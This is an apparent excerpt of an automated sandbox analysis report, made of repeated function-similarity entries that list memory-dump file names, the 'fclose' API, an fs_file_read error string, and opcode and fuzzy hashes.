                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 06cd66b944d3a9319e3218b434eb9b47900b32e5ee9dd0b57d8b74fbf90c0a13
                                                                    • Instruction ID: f74da38735d695df0fa7f797b19d8b08c559f478d00dc123c03869bb633a1d0f
                                                                    • Opcode Fuzzy Hash: 06cd66b944d3a9319e3218b434eb9b47900b32e5ee9dd0b57d8b74fbf90c0a13
                                                                    • Instruction Fuzzy Hash: 71F0E253B08E0741FB139A46B8403BD224A2F413B4E6905B9CD090B2F2EE3DAC83C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 033238ed9175e08685e853d76087e5a60c74730473e37325a77fd666deea56be
                                                                    • Instruction ID: defa58e85b5ed61bfb4a90c0802fc85199a3931ce0e5bd1b87b676f17361833e
                                                                    • Opcode Fuzzy Hash: 033238ed9175e08685e853d76087e5a60c74730473e37325a77fd666deea56be
                                                                    • Instruction Fuzzy Hash: C7F08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD5D0B6F5EE3DAC87C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: b1e857a3999b33b170259fa192d7dbe1d7372b98f6c06e000dbe99d88e484c62
                                                                    • Instruction ID: 979e4d9a53ac6481427d52e76c72ce4ae0a1a6b7c7b6a25f7c9ddf34878b7dea
                                                                    • Opcode Fuzzy Hash: b1e857a3999b33b170259fa192d7dbe1d7372b98f6c06e000dbe99d88e484c62
                                                                    • Instruction Fuzzy Hash: 70F0E253B08E0341FB139A86B8403BD224A2F413B4E6904B9CD090B6F1EE3DAC83C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: ee052a5866863e0b9580393c0c831830d4aea63d19b33e7002ba1fa6b3f918a8
                                                                    • Instruction ID: db439739b9188074c73f3163a66e9b4eaf4243eb0092e1113e71940c4be8e2c1
                                                                    • Opcode Fuzzy Hash: ee052a5866863e0b9580393c0c831830d4aea63d19b33e7002ba1fa6b3f918a8
                                                                    • Instruction Fuzzy Hash: 2BF08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD5D0B6F5EE3DAC87C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 8688466a7ff7be1a657261c91ed8f130cb98350b75de14d50a5770a6db4e688a
                                                                    • Instruction ID: 4a93de2567861d3842d79e2b7536ef68b627affe69d1718176d6ef2d5408cb78
                                                                    • Opcode Fuzzy Hash: 8688466a7ff7be1a657261c91ed8f130cb98350b75de14d50a5770a6db4e688a
                                                                    • Instruction Fuzzy Hash: 9DF08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD590B6F6EE3DAC87C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 033238ed9175e08685e853d76087e5a60c74730473e37325a77fd666deea56be
                                                                    • Instruction ID: defa58e85b5ed61bfb4a90c0802fc85199a3931ce0e5bd1b87b676f17361833e
                                                                    • Opcode Fuzzy Hash: 033238ed9175e08685e853d76087e5a60c74730473e37325a77fd666deea56be
                                                                    • Instruction Fuzzy Hash: C7F08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD5D0B6F5EE3DAC87C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: b1e857a3999b33b170259fa192d7dbe1d7372b98f6c06e000dbe99d88e484c62
                                                                    • Instruction ID: 979e4d9a53ac6481427d52e76c72ce4ae0a1a6b7c7b6a25f7c9ddf34878b7dea
                                                                    • Opcode Fuzzy Hash: b1e857a3999b33b170259fa192d7dbe1d7372b98f6c06e000dbe99d88e484c62
                                                                    • Instruction Fuzzy Hash: 70F0E253B08E0341FB139A86B8403BD224A2F413B4E6904B9CD090B6F1EE3DAC83C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: ee052a5866863e0b9580393c0c831830d4aea63d19b33e7002ba1fa6b3f918a8
                                                                    • Instruction ID: db439739b9188074c73f3163a66e9b4eaf4243eb0092e1113e71940c4be8e2c1
                                                                    • Opcode Fuzzy Hash: ee052a5866863e0b9580393c0c831830d4aea63d19b33e7002ba1fa6b3f918a8
                                                                    • Instruction Fuzzy Hash: 2BF08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD5D0B6F5EE3DAC87C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 8688466a7ff7be1a657261c91ed8f130cb98350b75de14d50a5770a6db4e688a
                                                                    • Instruction ID: 4a93de2567861d3842d79e2b7536ef68b627affe69d1718176d6ef2d5408cb78
                                                                    • Opcode Fuzzy Hash: 8688466a7ff7be1a657261c91ed8f130cb98350b75de14d50a5770a6db4e688a
                                                                    • Instruction Fuzzy Hash: 9DF08253B08E0741FB539A46B8417BD225A2F413B4E6945B9CD590B6F6EE3DAC87C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 06cd66b944d3a9319e3218b434eb9b47900b32e5ee9dd0b57d8b74fbf90c0a13
                                                                    • Instruction ID: f74da38735d695df0fa7f797b19d8b08c559f478d00dc123c03869bb633a1d0f
                                                                    • Opcode Fuzzy Hash: 06cd66b944d3a9319e3218b434eb9b47900b32e5ee9dd0b57d8b74fbf90c0a13
                                                                    • Instruction Fuzzy Hash: 71F0E253B08E0741FB139A46B8403BD224A2F413B4E6905B9CD090B2F2EE3DAC83C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 891a2645fa3a214443c6745bbb264d24d59a494fae9dd5092461ba76f753e83c
                                                                    • Instruction ID: e14b2eb0e8aa9ec304f687a9427cb607a9163039d405500ca7e49d111f12fcf9
                                                                    • Opcode Fuzzy Hash: 891a2645fa3a214443c6745bbb264d24d59a494fae9dd5092461ba76f753e83c
                                                                    • Instruction Fuzzy Hash: FFF0BE53B08E0741FB139A46B8403BD224A2F413B4E6905B9CD090B6F2EE3DAC828220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: f290af3adf19bc87954ef24740a84b0980bee8df0861315649091d8159a92313
                                                                    • Instruction ID: 3eda3cb2489d0b03136e9ca7c8a4fd845145f92d8864729f821939f1ac7e418a
                                                                    • Opcode Fuzzy Hash: f290af3adf19bc87954ef24740a84b0980bee8df0861315649091d8159a92313
                                                                    • Instruction Fuzzy Hash: 39F0BE53B08D0341FB139A46B8403BD224A2F413B4E6904B9CD0C0B6F1EE3DA8828220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2559943687.00007FFE11501000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE11500000, based on PE: true
                                                                    • Associated: 00000014.00000002.2559924904.00007FFE11500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559965341.00007FFE11513000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559980508.00007FFE11514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2559997129.00007FFE1151D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560013124.00007FFE11520000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560027784.00007FFE11521000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560045093.00007FFE11524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe11500000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 0c6b05e59e831c7e199db39c08246d60a0e1b9e38502d795e3b27ec33d1e38d1
                                                                    • Instruction ID: 5393c416ee496d65244a3e57e23b0784ef923a76df67f3fa916aecb2c951916f
                                                                    • Opcode Fuzzy Hash: 0c6b05e59e831c7e199db39c08246d60a0e1b9e38502d795e3b27ec33d1e38d1
                                                                    • Instruction Fuzzy Hash: D5F0BE53B08D0341FB139A46B8413BD224A2F413B4E6904B9CD190B6F2EE3DAC828220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 990a221dfb3cb8aeeb7552017c1aa3505dc4d2da84d681610558626fdd00577d
                                                                    • Instruction ID: 5e36432166459c1223ea2b41f05623d7ee7d51c3fef118a13bf4f7f1a6c99294
                                                                    • Opcode Fuzzy Hash: 990a221dfb3cb8aeeb7552017c1aa3505dc4d2da84d681610558626fdd00577d
                                                                    • Instruction Fuzzy Hash: 6EF0BE23B09E0249FA529A06B4407BE12411F60374E0901B2CD2D6B6E1EE3DAC878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: 3de8bbb853dfdf7682b0827993847d962f4b612fe79d9d3c87e993878a22dcee
                                                                    • Instruction ID: 04afcb6d773d3b176d47330c1eea07e3c9741799fd754d110b7561d7b3804af4
                                                                    • Opcode Fuzzy Hash: 3de8bbb853dfdf7682b0827993847d962f4b612fe79d9d3c87e993878a22dcee
                                                                    • Instruction Fuzzy Hash: FFF0BE23F09E0249FA529A06B4407BE12411F60374E0901B1CD2D2B2E1EE3DAC878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: dac8eb63fc54e1f6c4a3f30d4fbec8f1a2d25ac8b79450a3fb76d79718e9249a
                                                                    • Instruction ID: 2cfad29a25d025878c5124cd53bef9a082a48deddfa73b40465188ec2dca256f
                                                                    • Opcode Fuzzy Hash: dac8eb63fc54e1f6c4a3f30d4fbec8f1a2d25ac8b79450a3fb76d79718e9249a
                                                                    • Instruction Fuzzy Hash: 00F0BE23B09E0249FA529A06B4417BE12411F60374E0901B1CD3D2B2E2EE3DAC878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_20_2_7ffe13300000_main.jbxd
                                                                    Similarity
                                                                    • API ID: fclose
                                                                    • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                    • API String ID: 3125558077-1073242539
                                                                    • Opcode ID: cc99faef8402a9311c25be1ff5315f91a79a7d6813b935e0675048b13d9bd8e3
                                                                    • Instruction ID: 8d5bf5e3610cb8bdb82ec85c1d9cc3ea00b71e768511f85e28fd516a867290f1
                                                                    • Opcode Fuzzy Hash: cc99faef8402a9311c25be1ff5315f91a79a7d6813b935e0675048b13d9bd8e3
                                                                    • Instruction Fuzzy Hash: A6F0BE23B09E0649FA529A06B4407BE12411F60374E0902B1CD2D2B2E2EE3DAC878208
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000014.00000002.2560074476.00007FFE13301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000014.00000002.2560059627.00007FFE13300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560096145.00007FFE13310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560114963.00007FFE13318000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560131841.00007FFE1331B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                    • Associated: 00000014.00000002.2560148324.00007FFE1331C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
